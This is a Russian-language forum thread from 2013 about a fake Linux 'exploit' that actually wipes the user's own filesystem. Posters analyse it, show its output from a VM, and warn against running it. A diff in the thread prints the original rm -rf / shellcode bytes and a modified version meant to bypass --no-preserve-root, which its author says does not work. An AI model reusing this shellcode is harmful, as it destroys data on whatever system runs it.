The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

В Сети зафиксирован массовый взлом серверов на базе Linux, opennews (?), 19-Фев-13, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


191. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Xasd (ok), 19-Фев-13, 17:19 
> http://pastebin.com/WgXrebLq
> А вот в чем дело! о_О

странный скрипт.

просит указать <target> и <port> в качестве переменных ``argv``...

но при этом так и НЕ использует эти ``argv`` :-)

Ответить | Правка | К родителю #166 | Наверх | Cообщить модератору

196. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok), 19-Фев-13, 17:23 
>> http://pastebin.com/WgXrebLq
>> А вот в чем дело! о_О
> странный скрипт.
> просит указать <target> и <port> в качестве переменных ``argv``...
> но при этом так и НЕ использует эти ``argv`` :-)

Ага. "Новость о взломе - поломано 50 компьютеров".

"Эксплоит, тестирующий по поводу новости о взломе - поломано 50000 компьютеров".


А что он делает, на глаз можете определить?

Ответить | Правка | Наверх | Cообщить модератору

202. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok), 19-Фев-13, 17:29 
Вообще-то нормальная практика - оторвать кусок, чтобы совсем уж скрипткиддисы не гоняли
Ответить | Правка | К родителю #191 | Наверх | Cообщить модератору

204. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok), 19-Фев-13, 17:32 
не, там какая-то невнятная муть, судя по всему.
вот это вот - (*(void(*)())decoder)(); - как-то совсем не радует
Ответить | Правка | Наверх | Cообщить модератору

207. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok), 19-Фев-13, 17:34 
> не, там какая-то невнятная муть, судя по всему.
> вот это вот - (*(void(*)())decoder)(); - как-то совсем не радует

Да вообще не стоит сомнительную муть из интернета самому компилировать и запускать. Здесь вам не тут!

Ответить | Правка | Наверх | Cообщить модератору

211. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok), 19-Фев-13, 17:38 
Ну, на то и виртуалки. И, кстати, результат забавный:

[alex@host ~]$ sudo ./a.out 10.0.0.1 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
/bin//rm: it is dangerous to operate recursively on `/'
/bin//rm: use --no-preserve-root to override this failsafe
[alex@buzzalex ~]$

Ответить | Правка | Наверх | Cообщить модератору

399. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Михрютка (ok), 19-Фев-13, 22:15 
> Ну, на то и виртуалки. И, кстати, результат забавный:
> [alex@host ~]$ sudo ./a.out 10.0.0.1 22
> MIKU! MIKU! MIKU!
> [-] Exploit failed.
> /bin//rm: it is dangerous to operate recursively on `/'
> /bin//rm: use --no-preserve-root to override this failsafe
> [alex@buzzalex ~]$

//fixed


--- coolxploit.c        2013-02-19 20:00:56.084967001 +0200
+++ coolxploit_fix.c    2013-02-19 20:13:16.276967001 +0200
@@ -29,15 +29,11 @@
     exit(1);
}

-unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
-                           "\x6a\x2f\x89\xe7\x52"
-                           "\x66\x68\x2d\x66\x89"
-                           "\xe6\x52\x66\x68\x2d"
-                           "\x72\x89\xe1\x52\x68"
-                           "\x2f\x2f\x72\x6d\x68"
-                           "\x2f\x62\x69\x6e\x89"
-                           "\xe3\x52\x57\x56\x51"
-                           "\x53\x89\xe1\xcd\x80";
+unsigned char decoder[]=   "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08"
+                           "\x89\x5e\x1f\x89\x46\x23\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x23\xcd"
+                           "\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f\x72\x6d\x4f\x2d\x2d\x6e"
+                           "\x6f\x2d\x70\x72\x65\x73\x65\x72\x76\x65\x2d\x72\x6f\x6f\x74\x4f\x54"
+                           "\x4f\x52\x41\x54\x4f\x52\x41\x54\x4f\x52\x41";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                            "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"

Ответить | Правка | Наверх | Cообщить модератору

410. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok), 19-Фев-13, 22:45 
Добавил ключик, что ли? :-)
Ответить | Правка | Наверх | Cообщить модератору

418. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Михрютка (ok), 19-Фев-13, 23:10 
> Добавил ключик, что ли? :-)

ага. щас проверил, оно, правда, нифига не работает, но мне уже лень разбираться, где я с офсетами напортачил.

фатя, и так полчаса убил, сочиняя на авке эскейпирование опкодов из дампа.

Ответить | Правка | Наверх | Cообщить модератору

597. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (-), 21-Фев-13, 01:53 
Дожили, скрипткидисы даже ремувалку файлов засунуть в payload уже нормально не могут.
Ответить | Правка | Наверх | Cообщить модератору

356. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (-), 19-Фев-13, 21:09 
> странный скрипт.

Анализ странного скрипта, или немного гуглинга по правильным кейвордам: http://www.tamonten.com/how-not-to-exploit-a-box

Категорически не советую запускать: судя по всему там попросту замаскированный под пенек rm -rf / aka попытка в 100500-й раз натянуть скрипткидизов возомнивших себя крутыми.

Ответить | Правка | К родителю #191 | Наверх | Cообщить модератору

427. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Xasd (ok), 20-Фев-13, 00:48 
да, забавная действительно штука :) , с научной точки зрения..
Ответить | Правка | Наверх | Cообщить модератору

598. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (-), 21-Фев-13, 01:57 
> да, забавная действительно штука :) , с научной точки зрения..

Правда писали это такие же долбодятлы как те на которых он ориентирован. Ну то-есть, payload там кривой и не работает нифига. Что за люди, даже систему раздестроить нормально не могут :).

А вообще на месте этих кидей я бы лучше в payload'е открывал шелл к ... локалхосту :). А дальше пусть кидис сам себя и хакает наздоровье. Готов поспорить, немало киддей удивилось бы результату хака. Так что если кто хочет натянуть очередную порцию кидисов - дарю идею! :)

Ответить | Правка | Наверх | Cообщить модератору

617. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Xasd (ok), 21-Фев-13, 09:24 
> А дальше пусть кидис сам себя и хакает наздоровье.

первую команду которую он введёт -- наверняка  как раз и будет ---- rm -vRf /*

:-D

действительно -- этот план на много лучше :)

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру